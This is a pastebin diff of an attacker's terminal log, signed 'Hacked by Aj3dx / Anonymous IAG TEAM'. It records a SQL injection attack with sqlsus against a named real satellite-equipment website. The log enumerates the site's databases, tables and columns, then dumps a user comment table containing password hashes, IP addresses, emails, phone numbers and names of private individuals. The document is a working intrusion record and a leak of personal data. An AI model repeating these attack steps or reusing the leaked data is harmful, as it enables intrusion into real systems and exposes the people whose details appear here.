View difference between Paste ID: gtx71Zmx and 5nzqA4eX
SHOW: | | - or go back to the newest paste.
1
Hacked by Aj3dx
2
Anonymous IAG TEAM
3
4
Satellite: 
5
6
┌─[root@parrot]─[/home/aj3dx]
7
└──╼ #sqlsus -g vuln.conf
8
9
              sqlsus version 0.7.2
10
11
  Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)
12
13
vuln.conf already exists, overwrite ? [y|n] ? y
14
[+] Configuration successfully saved to vuln.conf
15
┌─[root@parrot]─[/home/aj3dx]
16
└──╼ #nano vuln.conf
17
┌─[root@parrot]─[/home/aj3dx]
18
└──╼ #sqlsus vuln.conf
19
20
              sqlsus version 0.7.2
21
22
  Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)
23
24
[+] Session "eng.sekisat.com" created
25
sqlsus> start
26
[+] Correct number of columns for UNION : 9 (1,1,1,1,1,1,1,0,0)
27
[+] Length restriction on URL : 8199 bytes                      
28
[+] Filling %target...
29
+----------+-----------------------------+
30
| Variable | Value                       |
31
+----------+-----------------------------+
32
| database | SEKIsekisat                 |
33
| user     | 'sekisat'@'localhost'       |
34
| version  | 5.5.31-0ubuntu0.12.04.1-log |
35
+----------+-----------------------------+
36
3 rows in set 
37
38
sqlsus> get database
39
40
Usage : get <item>
41
42
This command retrieves information from MySQL system tables (information_schema.*).
43
Note that it will only work on MySQL >= 5. Otherwise, see "brute".
44
45
Possible items :
46
tables               : get the names of the tables of the current database (as per "set")
47
columns [table_name] : get the names of the columns [for the given table]
48
count [table_name]   : get the count(*) for each table [or the given table]
49
db                   : same as get tables + columns + count
50
privs                : get the privileges for the user
51
databases            : get the names of all the databases
52
53
sqlsus> get databases
54
[+] Getting databases names
55
+---------------+                                                     
56
| Databases     |
57
+---------------+
58
| SEKIsekisat   |
59
| SEKIBBS       |
60
| SEKIWooJin    |
61
| SEKIcounter   |
62
| SEKIcustomer  |
63
| SEKIgnu4      |
64
| SEKIip_class  |
65
| SEKIiskylife  |
66
| SEKIproduct   |
67
| SEKIsatellite |
68
| SEKIshop      |
69
| SEKIstock     |
70
| SEKIzipcode   |
71
+---------------+
72
13 rows in set 
73
74
sqlsus> get tables
75
[+] Getting tables names
76
                                                                      
77
<( SEKIsekisat )>
78
79
	[basket]
80
		
81
82
	[board_benchmark]
83
		
84
85
	[board_category]
86
		
87
88
	[board_comment]
89
		
90
91
	[board_digital]
92
		
93
94
	[board_forum_eng]
95
		
96
97
	[board_free_broadcasting]
98
		
99
100
	[board_group]
101
		
102
103
	[board_pds]
104
		
105
106
	[board_pds_eng]
107
		
108
109
	[board_satellite_index]
110
		
111
112
	[board_satellite_pds]
113
		
114
115
	[board_service]
116
		
117
118
	[board_service_eng]
119
		
120
121
	[board_service_secret]
122
		
123
124
	[board_setup]
125
		
126
127
	[company]
128
		
129
130
	[company22]
131
		
132
133
	[company_category]
134
		
135
136
	[company_category22]
137
		
138
139
	[construction_history]
140
		
141
142
	[counter_200705]
143
		
144
145
	[counter_200708]
146
		
147
148
	[counter_200710]
149
		
150
151
	[counter_200711]
152
		
153
154
	[counter_200901]
155
		
156
157
	[counter_pageview_200704]
158
		
159
160
	[counter_pageview_200705]
161
		
162
163
	[counter_pageview_200707]
164
		
165
166
	[counter_pageview_200708]
167
		
168
169
	[counter_pageview_200710]
170
		
171
172
	[counter_pageview_200711]
173
		
174
175
	[counter_pageview_200712]
176
		
177
178
	[counter_pageview_200802]
179
		
180
181
	[counter_pageview_200804]
182
		
183
184
	[counter_pageview_200805]
185
		
186
187
	[counter_pageview_200806]
188
		
189
190
	[counter_pageview_200809]
191
		
192
193
	[counter_pageview_200901]
194
		
195
196
	[counter_pageview_200908]
197
		
198
199
	[employ_applicant]
200
		
201
202
	[employ_notice]
203
		
204
205
	[fieldselectdefine]
206
		
207
208
	[focus]
209
		
210
211
	[gallery_installation_photo_eng]
212
		
213
214
	[gallery_satellite]
215
		
216
217
	[gallery_satellite_photo_eng]
218
		
219
220
	[gallery_sky_satellite]
221
		
222
223
	[gallery_user_photo_eng]
224
		
225
226
	[gallery_user_satellite]
227
		
228
229
	[package]
230
		
231
232
	[sat_channel]
233
		
234
235
	[sat_channel_category]
236
		
237
238
	[sat_channel_set]
239
		
240
241
	[sat_channel_set_change]
242
		
243
244
	[sat_language_category]
245
		
246
247
	[sat_products]
248
		
249
250
	[sat_relay]
251
		
252
253
	[sat_relay_change]
254
		
255
256
	[sat_satellite]
257
		
258
259
	[sat_state_category]
260
		
261
262
	[satellite_photo]
263
		
264
265
	[service_news]
266
		
267
268
	[service_news_eng]
269
		
270
271
	[service_notice]
272
		
273
274
	[service_notice_eng]
275
		
276
277
	[service_user_market]
278-
	[sky_satellite_photo]
278+
279
280
	[service_user_market_comment]
281
		
282
283
	[sky_satellite_photo]
284
285
Possible items :
286
tables               : get the names of the tables of the current database (as per "set")
287
columns [table_name] : get the names of the columns [for the given table]
288
count [table_name]   : get the count(*) for each table [or the given table]
289
db                   : same as get tables + columns + count
290
privs                : get the privileges for the user
291
databases            : get the names of all the databases
292
293
sqlsus> get columns sat_channel_set_change
294
[+] Getting columns names for SEKIsekisat.sat_channel_set_change
295
+-----------------------------------+                                 
296
| Columns in sat_channel_set_change |
297
+-----------------------------------+
298
| no                                |
299
| channel_set_no                    |
300
| satellite_no                      |
301
| relay_no                          |
302
| channel_no                        |
303
| video_format                      |
304
| audio_format                      |
305
| resolution                        |
306
| encryption                        |
307
| free_mode                         |
308
| video_id                          |
309
| audio_id                          |
310
| audio_analog                      |
311
| pcr                               |
312
| members_id                        |
313
| regdate                           |
314
+-----------------------------------+
315
16 rows in set 
316
317
sqlsus> get columns service_user_market_comment
318
[+] Getting columns names for SEKIsekisat.service_user_market_comment
319
+----------------------------------------+                            
320
| Columns in service_user_market_comment |
321
+----------------------------------------+
322
| no                                     |
323
| views                                  |
324
| parent_no                              |
325
| members_id                             |
326
| writer                                 |
327
| passwd                                 |
328
| comment                                |
329
| ip                                     |
330
| count                                  |
331
| regdate                                |
332
+----------------------------------------+
333
10 rows in set 
334
335
sqlsus> selct * from  service_user_market_comment
336
"selct * from  service_user_market_comment" command not implemented
337
sqlsus> select * from  service_user_market_comment
338
+----+-------+-----------+------------+------------------+-------------------------------------------+-----------------------------------------------------------------------------------------------------------------------+----------------+-------+---------------------+
339
| no | views | parent_no | members_id | writer           | passwd                                    | comment                                                                                                               | ip             | count | regdate             |
340
+----+-------+-----------+------------+------------------+-------------------------------------------+-----------------------------------------------------------------------------------------------------------------------+----------------+-------+---------------------+
341
|  5 |     1 |        18 |            | 폴              | *FB6B86FECF96ACD45F41F1C59ADEB0D4CDC7E1B6 | 저두 중고위성 안테나 연락부탁드립니다.
342
어떤 사이즈든 알려주세요. 시골집에 설치하려구 합니다.
343
이왕 수신기도 있으면 알려주세요
344
[email protected] 감사합니다.| 122.32.127.154 |     0 | 2007-04-14 02:43:34 |
345
|  6 |     1 |        23 | lg2077     | 박일중        | *4427A478701D500C10CE01117DB5C919341DD826 | 중고  위성게측기 삽니다 텔래만이나 주다가 제품 무궁화 5호 만 잡으면 됨니다  011528-4277|  220.94.80.172 |     0 | 2007-07-19 18:50:48 |
346
|  7 |     1 |        27 | JuddyCrom  | 박철           | *B4ED24274654A59A9D0C639C4DA9EBA414B887D8 | 기기 상태와 가능하시면 사진멜로좀 볼수 있나요...
347
[email protected]
348
그리고 판매자 지역... 여긴 대전이라서요|  116.122.199.2 |     0 | 2007-10-21 00:13:55 |
349
|  8 |     1 |        25 |            | 형석           | *AB60BDFD62AC4CDDF053FFEF844479304B455D4A | 신용이없네요 몇개월째올려놓았다  판매약속을 깨는 신용없으신분                             | 211.107.28.189 |     0 | 2007-11-15 12:45:22 |
350
| 10 |     1 |        18 |            | [email protected] | *C3A68B716F0697CE43706057022B7DDACFB52E72 | 중고위성수신기 사려구요.물론작동은잘되야구요.있으면 알려주세요                           |   218.62.88.89 |     0 | 2008-02-28 15:36:59 |
351
| 13 |     1 |        38 | JuddyCrom  | 박철           | *B4ED24274654A59A9D0C639C4DA9EBA414B887D8 | 님께서 예전에 일반위성수신기묶음판매올리시지 않았는지요?
352
묶음으로 저렴하게 올려놓으셨던데 혹시 아직 많이 보유하고 계신지?
353
016-9890-5828 24시간통화가능합니다. 혹시 있으시면 문자주세요 전화드리지요| 116.122.199.27 |     0 | 2008-10-06 22:59:03 |
354
| 12 |     1 |        35 |            | 조삼형        | *89C6B530AA78695E257E55D63C00A6EC9AD3E977 | 판매완료되었습니다.                                                                                          |    121.88.13.7 |     0 | 2008-04-12 17:22:45 |
355
| 14 |     1 |        44 |            | JuddyCrom        | *266E373F0E6A43B644ADCE01403007E5A90F749A | CATV계측기와 텔레만계측기는 판매완료되었습니다.
356
현재 다가트론 계측기 모델만 한대 남아있습니다.| 218.50.202.176 |     0 | 2009-04-23 12:21:55 |
357
| 16 |     1 |        20 | jin1588    | 진종택        | *99A09072ED5C9A37EA9FB76DB6E2BC444748D124 | 지금도물건이있는지?010-6235-1087                                                                             |  222.97.17.105 |     0 | 2010-10-20 06:34:36 |
358
+----+-------+-----------+------------+------------------+-------------------------------------------+-----------------------------------------------------------------------------------------------------------------------+----------------+-------+---------------------+
359
9 rows in set (2 hits)
360
361
sqlsus>